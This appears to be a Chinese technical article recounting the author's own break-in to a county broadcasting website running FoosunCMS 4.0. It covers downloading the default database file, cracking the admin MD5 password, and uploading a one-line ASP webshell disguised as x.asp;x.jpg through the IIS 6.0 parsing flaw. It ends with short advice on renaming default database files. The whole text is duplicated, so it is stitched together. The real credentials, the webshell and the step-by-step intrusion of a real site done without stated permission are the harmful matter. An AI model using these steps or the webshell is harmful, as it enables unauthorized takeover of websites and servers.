论文部分内容阅读
最近关于网站新闻的故事很多,昨天刚看到某领导为视察“悬浮照”辩解,今天又能看到某“临时工”在网站发布了错误新闻。难道情况真的如此?我们经常能看到有人通过网站漏洞破解了登录密码,登录后制造恶作剧,那他们是怎样做到的?网站漏洞又是怎样被发现的呢?
对于采用Access数据库的网站来说,如果存在数据库下载漏洞,会给网站的安全性造成极大的危害,可以说是小漏洞大危害。下面就用我亲身经历的一个案例来展示数据库下载漏洞的危害。
一次在访问一个县的广电系统的门户网站时,出于习惯,顺手在网站地址后面加了个admin/,出现了“This Virtual Directory does not allow contents to be listed.”的错误提示,如图1。
通过数据库获取密码
看来存在admin目录。admin目录一般是网站的后台目录,看到存在admin目录,就决定看看网站的安全性如何。虽然知道了可能的后台目录,却还不知道后台登录页面的文件名,来试试常见的后台登录文件的名字,首先尝试admin_login.asp,提示“系统找不到指定的文件”,看来后台文件不是admin_login.asp,再尝试login.asp,这次出来了后台登录页面,如图2。
通过后台登录页面上的文字知道网站采用的程序是FoosunCMS 4.0。尝试了几个比如用户名admin密码admin等弱口令都不对。这时候想到了网站用的是FoosunCMS 4.0,到网上下载FoosunCMS 4.0的源代码,然后在源代码中看能不能找到可以利用的地方。在中国站长站下载到了FoosunCMS网站内容管理系统 v4.0 sp7的源代码,解压下载回来的文件后发现FoosunCMS网站内容管理系统 v4.0 sp7采用的是Access数据库,默认存放数据库文件的目录为Foosun_Data,存放管理员信息的数据库的默认名字为FS400.mdb,如图3。
看这个网站的数据库文件是不是还是默认的目录默认的文件名,在网站地址后面加上Foosun_Data/FS400.mdb,出现了下载文件的对话框! 如图4。
很幸运,目标网站没有更改存放数据库文件的默认目录也没有更改数据库文件的名字,导致我下载到了网站的数据库文件。用Microsoft Office Access 2003打开下载回来的数据库文件,在表FS_MF_Admin中发现了管理员的用户名admin和密码db7636b853b11fce,如图5。
破解密码登录后台
密码到在线破解网站http://www.cmd5.com/default.aspx进行破解,显示“已查到,这是一条付费记录,密文类型:md5。”,查到了,但需要付费用户登录后才能查看结果,找了个有付费用户的朋友帮忙,得到密码zaijian$alang。
用得到的管理员的用户名和密码进入了后台,如图6。
在后台首页看到WEB服务器软件用的是Microsoft-IIS/6.0。在后台看能得到webshell不。在“新闻管理”下点击“添加新闻”来到了添加新闻的页面,点“插入/编辑图像”按钮,然后在出来的“图形属性”对话框中点“浏览服务器”按钮就来到了如图7的上传图片的地方。把ASP木马服务端代码<%eval request("a")%>保存为文件x.asp;x.jpg。点图7中的“上传”按钮,在“文件1”中通过“浏览”按钮选择x.asp;x.jpg,一定要保证自动命名的选项为“不自动命名”,点“确定”按钮后文件x.asp;x.jpg上传到了服务器上,而且上传上去后的文件名还为x.asp;x.jpg,如图8。
文件x.asp;x.jpg上传到了Files目录下,访问地址为http://www.xxx.net/Files/x.asp;x.jpg。shell的地址就是http://www.xxx.net/Files/x.asp;x.jpg。可能有人会问.jpg文件怎么会是shell文件呢?Microsoft-IIS/6.0有一个解析漏洞,会把x.asp;x.jpg当成ASP文件来解析,网站WEB服务器软件用的是Microsoft-IIS/6.0,正好可以利用解析漏洞。用lake2的eval最小马发送端连接shell的地址http://www.xxx.net/Files/x.asp;x.jpg,写上密码a,发现shell的功能正常,如图9。
获得网站控制权
得到这个shell就获得了对网站文件的完全控制权,利用shell可以上传文件到网站,可以编辑网站下的所有文件,当然也可以删除网站目录下的任何文件。至此一个小型门户网站的安全性荡然无存,如果我在网页文件中插入挂马代码进行挂马,后果更是不堪设想。好在我只是看下网站的安全性,很快删除了shell文件,没有对网站目录下的任何文件进行修改或删除。
这个数据库下载漏洞只要还存在,就有可能被别人也利用这个漏洞得到网站的shell,至于后来者会不会做出危害网站的事情,谁也不敢保证。只要这个漏洞还存在,网站的安全就面临着一个随时可能爆炸的炸弹。
数据库下载漏洞是一个低级的小漏洞,但它的危害性却是巨大的。一旦这个漏洞被人利用,轻则一个网站彻底沦陷,重则网站所在的服务器沦陷,更甚者,一个服务器集群都可能因这个小漏洞而沦陷。
其实,数据库下载漏洞很好修补,把默认的数据库文件的名字改成一个比较复杂的名字就可以了。修改网页的版权信息,不让入侵者知道你网站用的是什么程序进而不知道到哪里找默认数据库文件的名字也是一个不错的防范数据库下载漏洞的方法,不过最彻底的方法还是修改数据库文件默认的名字。
希望各位站长朋友尤其是网站程序有.mdb数据库的朋友注意防范数据库下载漏洞。
对于采用Access数据库的网站来说,如果存在数据库下载漏洞,会给网站的安全性造成极大的危害,可以说是小漏洞大危害。下面就用我亲身经历的一个案例来展示数据库下载漏洞的危害。
一次在访问一个县的广电系统的门户网站时,出于习惯,顺手在网站地址后面加了个admin/,出现了“This Virtual Directory does not allow contents to be listed.”的错误提示,如图1。
通过数据库获取密码
看来存在admin目录。admin目录一般是网站的后台目录,看到存在admin目录,就决定看看网站的安全性如何。虽然知道了可能的后台目录,却还不知道后台登录页面的文件名,来试试常见的后台登录文件的名字,首先尝试admin_login.asp,提示“系统找不到指定的文件”,看来后台文件不是admin_login.asp,再尝试login.asp,这次出来了后台登录页面,如图2。
通过后台登录页面上的文字知道网站采用的程序是FoosunCMS 4.0。尝试了几个比如用户名admin密码admin等弱口令都不对。这时候想到了网站用的是FoosunCMS 4.0,到网上下载FoosunCMS 4.0的源代码,然后在源代码中看能不能找到可以利用的地方。在中国站长站下载到了FoosunCMS网站内容管理系统 v4.0 sp7的源代码,解压下载回来的文件后发现FoosunCMS网站内容管理系统 v4.0 sp7采用的是Access数据库,默认存放数据库文件的目录为Foosun_Data,存放管理员信息的数据库的默认名字为FS400.mdb,如图3。
看这个网站的数据库文件是不是还是默认的目录默认的文件名,在网站地址后面加上Foosun_Data/FS400.mdb,出现了下载文件的对话框! 如图4。
很幸运,目标网站没有更改存放数据库文件的默认目录也没有更改数据库文件的名字,导致我下载到了网站的数据库文件。用Microsoft Office Access 2003打开下载回来的数据库文件,在表FS_MF_Admin中发现了管理员的用户名admin和密码db7636b853b11fce,如图5。
破解密码登录后台
密码到在线破解网站http://www.cmd5.com/default.aspx进行破解,显示“已查到,这是一条付费记录,密文类型:md5。”,查到了,但需要付费用户登录后才能查看结果,找了个有付费用户的朋友帮忙,得到密码zaijian$alang。
用得到的管理员的用户名和密码进入了后台,如图6。
在后台首页看到WEB服务器软件用的是Microsoft-IIS/6.0。在后台看能得到webshell不。在“新闻管理”下点击“添加新闻”来到了添加新闻的页面,点“插入/编辑图像”按钮,然后在出来的“图形属性”对话框中点“浏览服务器”按钮就来到了如图7的上传图片的地方。把ASP木马服务端代码<%eval request("a")%>保存为文件x.asp;x.jpg。点图7中的“上传”按钮,在“文件1”中通过“浏览”按钮选择x.asp;x.jpg,一定要保证自动命名的选项为“不自动命名”,点“确定”按钮后文件x.asp;x.jpg上传到了服务器上,而且上传上去后的文件名还为x.asp;x.jpg,如图8。
文件x.asp;x.jpg上传到了Files目录下,访问地址为http://www.xxx.net/Files/x.asp;x.jpg。shell的地址就是http://www.xxx.net/Files/x.asp;x.jpg。可能有人会问.jpg文件怎么会是shell文件呢?Microsoft-IIS/6.0有一个解析漏洞,会把x.asp;x.jpg当成ASP文件来解析,网站WEB服务器软件用的是Microsoft-IIS/6.0,正好可以利用解析漏洞。用lake2的eval最小马发送端连接shell的地址http://www.xxx.net/Files/x.asp;x.jpg,写上密码a,发现shell的功能正常,如图9。
获得网站控制权
得到这个shell就获得了对网站文件的完全控制权,利用shell可以上传文件到网站,可以编辑网站下的所有文件,当然也可以删除网站目录下的任何文件。至此一个小型门户网站的安全性荡然无存,如果我在网页文件中插入挂马代码进行挂马,后果更是不堪设想。好在我只是看下网站的安全性,很快删除了shell文件,没有对网站目录下的任何文件进行修改或删除。
这个数据库下载漏洞只要还存在,就有可能被别人也利用这个漏洞得到网站的shell,至于后来者会不会做出危害网站的事情,谁也不敢保证。只要这个漏洞还存在,网站的安全就面临着一个随时可能爆炸的炸弹。
数据库下载漏洞是一个低级的小漏洞,但它的危害性却是巨大的。一旦这个漏洞被人利用,轻则一个网站彻底沦陷,重则网站所在的服务器沦陷,更甚者,一个服务器集群都可能因这个小漏洞而沦陷。
其实,数据库下载漏洞很好修补,把默认的数据库文件的名字改成一个比较复杂的名字就可以了。修改网页的版权信息,不让入侵者知道你网站用的是什么程序进而不知道到哪里找默认数据库文件的名字也是一个不错的防范数据库下载漏洞的方法,不过最彻底的方法还是修改数据库文件默认的名字。
希望各位站长朋友尤其是网站程序有.mdb数据库的朋友注意防范数据库下载漏洞。